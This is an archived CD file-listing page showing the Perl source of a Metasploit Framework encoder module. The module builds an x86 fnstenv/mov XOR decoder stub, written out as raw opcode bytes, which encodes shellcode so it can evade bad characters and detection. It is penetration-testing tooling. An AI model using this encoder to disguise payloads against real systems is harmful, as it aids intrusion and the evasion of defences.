Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / encoders / PexFnstenvMov.pm < prev next >

Wrap

Text File | 2006-06-30 | 2KB | 56 lines

## # This file is part of the Metasploit Framework and may be redistributed # according to the licenses defined in the Authors field below. In the # case of an unknown or missing license, this file defaults to the same # license as the core Framework (dual GPLv2 and Artistic). The latest # version of the Framework can always be obtained from metasploit.com. ## package Msf::Encoder::PexFnstenvMov; use strict; use base 'Msf::Encoder::XorDword'; use Pex::Encoder; use Pex::x86; my $advanced = { }; my $info = { 'Name' => 'Pex Variable Length Fnstenv/mov Double Word Xor Encoder', 'Version' => '$Revision: 1.15 $', 'Authors' => [ 'spoonm <ninjatools [at] hush.com>', ], 'Arch' => [ 'x86' ], 'OS' => [ ], 'Description' => 'Variable-length fnstenv/mov dword xor encoder', 'Refs' => [ ], }; sub new { my $class = shift; return($class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_)); } sub _GenEncoder { my $self = shift; my $xor = shift; my $len = shift; my $badchars = shift; my $xorkey = pack('V', $xor); # spoon's smaller variable-length fnstenv encoder my $decoder = Pex::x86::Mov((($len - 1) / 4) + 1, "ecx", $badchars). "\xd9\xee". # fldz "\xd9\x74\x24\xf4". # fnstenv [esp - 12] "\x5b". # pop ebx "\x81\x73\x13". $xorkey . # xor_xor: xor DWORD [ebx + 22], xorkey "\x83\xeb\xfc". # sub ebx,-4 "\xe2\xf4"; # loop xor_xor return($decoder); } 1;